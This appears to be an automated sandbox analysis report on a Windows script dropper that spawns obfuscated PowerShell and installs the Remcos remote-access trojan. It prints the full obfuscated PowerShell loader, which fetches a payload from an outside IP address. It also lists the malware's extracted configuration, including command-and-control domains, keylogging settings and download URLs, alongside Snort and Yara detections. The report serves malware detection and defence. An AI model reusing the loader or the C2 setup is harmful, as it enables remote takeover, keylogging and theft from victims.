              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf", ProcessId: 2532, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpo

              Snort Signatures

              Timestamp:04/20/24-16:05:40.186650
              SID:2032776
              Source Port:49720
              Destination Port:3050
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/20/24-16:07:49.852728
              SID:2032777
              Source Port:3050
              Destination Port:49720
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Found malware configuration
              Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for domain / URL
              Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 6%Perma Link
              Source: jgbours284hawara01.duckdns.orgVirustotal: Detection: 6%Perma Link
              Source: http://87.121.105.163Virustotal: Detection: 17%Perma Link
              Source: http://87.121.105.163/Belyves242.hhkVirustotal: Detection: 15%Perma Link
              Multi AV Scanner detection for submitted file
              Source: rOferta_SKGNMECLemnedefinitionen353523577.wsfVirustotal: Detection: 11%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49720 -> 45.88.90.110:3050
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.6:49720
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: jgbours284hawara01.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: jgbours284hawara01.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.6:49720 -> 45.88.90.110:3050
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 87.121.105.163 87.121.105.163
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
              Source: global trafficHTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: global trafficHTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: unknownDNS traffic detected: queries for: jgbours284hawara01.duckdns.org
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Belyves242.hhkP
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Belyves242.hhkXR
              Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
              Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
              Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BF19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.H
              Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
              Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5B4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_1492.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5596
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5596
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5596Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5596Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489B1A62_2_00007FFD3489B1A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489BF522_2_00007FFD3489BF52
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348964FB2_2_00007FFD348964FB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34895CD82_2_00007FFD34895CD8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34893BFB2_2_00007FFD34893BFB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046BF2505_2_046BF250
